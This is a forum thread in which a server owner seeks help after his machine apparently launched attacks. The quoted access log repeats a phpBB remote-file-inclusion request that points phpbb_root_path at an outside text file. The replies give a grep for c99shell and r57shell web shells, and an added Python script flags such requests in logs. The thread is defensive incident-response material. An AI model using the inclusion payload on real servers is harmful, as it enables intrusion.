  1. #1

    My server attacks another. How can I fix it?

    46.165.123.xxx - - [17/Nov/2006:04:12:17 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:12:30 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:12:51 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:13:55 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:14:16 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:15:04 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:15:20 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:15:42 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:17:01 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:17:42 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:34:59 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:35:20 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:36:35 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:36:50 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:37:03 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:38:45 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"

    Hello. I am in a bad situation. Can you help me if you know the way of solution?
    Thank you very much for the time you gave.

  2. #2
    Might want to contact www.rack911.com

  3. #3
    You need to give more information; a section of a log isn't going to tell so much.

    I can only see some involvement of a forum script (phpbb).

  4. #4
    Quote Originally Posted by The Engine
    > You need to give more information; a section of a log isn't going to tell so much.
    >
    > I can only see some involvement of a forum script (phpbb).

    Thank you very much for your interest.

    I don't have more information. My DC sent me this log. And I just know the domains that were attacked. And the IPs. If you want I can send them.

    How can I find which domain has the phpbb that is dirty? There are some domains that have phpbb on my server. Do you think I can understand the problem by scanning the admin_board.php files of the phpbbs?

  5. #5
    If this log was sent by your DC, I assume this is the log from the attacked server? In this case, the phpbb is not on your server but you're probably hosting http://www.xxx.xxx/lol1.txt - unless 46.165.123.xxx is your server IP?

    Some clarification would help.
    Marie - Co-Owner
    Need Further Assistance ? Here you go !
    English, french and spanish support

  6. #6
    Quote Originally Posted by Yapluka
    > If this log was sent by your DC, I assume this is the log from the attacked server? In this case, the phpbb is not on your server but you're probably hosting http://www.xxx.xxx/lol1.txt - unless 46.165.123.xxx is your server IP?
    >
    > Some clarification would help.

    Hello.

    You are right that 46.165.123.xxx is mine and that the logs are from the attacked server. But I am not hosting those websites. That's all I know. What do you think about the problem? I want to have your comments on this subject.

    Thanks a lot for your interest.

  7. #7
    I would run a search for shell scripts like this, for example:

    Code:
    # -print0 / -0 keep file names that contain spaces or newlines intact
    find /home/ -type f -name "*.php" -print0 | xargs -0 grep -El 'c99shell|r57shell' >> /root/bad.txt

    This will paste the result of the search to the file /root/bad.txt

    Feel free to contact me if I can help in any way

  8. #8
    Quote Originally Posted by Yapluka
    > I would run a search for shell scripts like this, for example:
    >
    > Code:
    > find /home/ -type f -name "*.php" -print0 | xargs -0 grep -El 'c99shell|r57shell' >> /root/bad.txt
    >
    > This will paste the result of the search to the file /root/bad.txt
    >
    > Feel free to contact me if I can help in any way

    Thank you very much. It found some files. I deleted them. Do you think the problem has ended?

    I thought that the problem was about phpbb?

    What can I do to protect against shell scripts like those?

  9. #9
    phpbb is known as a vulnerable script and as such is targeted by a lot of kiddie scripts.
    If you found some shell scripts on your server, chances are they were used to connect to other servers and exploit some phpbb hosted there.

    You may want to look at the domlogs of the accounts where you found these bad files and see how they came in... then add some security to prevent them from coming back.

  10. #10
    Quote Originally Posted by Yapluka
    > You may want to look at the domlogs of the accounts where you found these bad files and see how they came in... then add some security to prevent them from coming back.

    I kept you busy. Thank you for replying to all my questions.

    But I don't know how to do the thing you said. Can you explain?
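
The domlog review suggested in post #9 can be scripted. The following is an added example, not code from anyone in the thread: it scans Apache combined-format access-log lines for requests that pass a URL as a query-parameter value, the pattern visible in the log in post #1, and records the status code so that answered (2xx) requests stand out from blocked (403) ones. The function names, the sample addresses and the `example.org` host are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Apache "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a URL is the remote-include pattern.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_remote_includes(lines):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # blank, truncated or non-access-log line
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                hits.append({"ip": m["ip"], "ts": m["ts"], "path": path,
                             "param": name, "remote": value,
                             "status": int(m["status"])})
    return hits


def summarize(hits):
    """Count hits per (path, parameter, status); check 2xx entries first."""
    return Counter((h["path"], h["param"], h["status"]) for h in hits)


# Constructed sample lines: documentation addresses and example.org host.
SAMPLE = [
    '192.0.2.10 - - [17/Nov/2006:04:12:17 -0500] "GET /admin/admin_board.php'
    '?phpbb_root_path=http://example.org/lol1.txt? HTTP/1.1" 403 1251 "-" "libwww-perl/5.76"',
    '192.0.2.10 - - [17/Nov/2006:04:12:30 -0500] "GET /forum/admin/admin_board.php'
    '?phpbb_root_path=http%3A%2F%2Fexample.org%2Flol1.txt%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.76"',
    '198.51.100.7 - - [17/Nov/2006:04:13:02 -0500] "GET /index.php?ref=google&page=2'
    ' HTTP/1.1" 200 8411 "-" "Mozilla/5.0"',
    'not an access-log line',
]

if __name__ == "__main__":
    for key, count in sorted(summarize(find_remote_includes(SAMPLE)).items()):
        print(count, *key)
```

A legitimate redirect parameter can also carry a URL, so hits are leads to compare against the timestamps of the files found by the search in post #7, not proof on their own.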
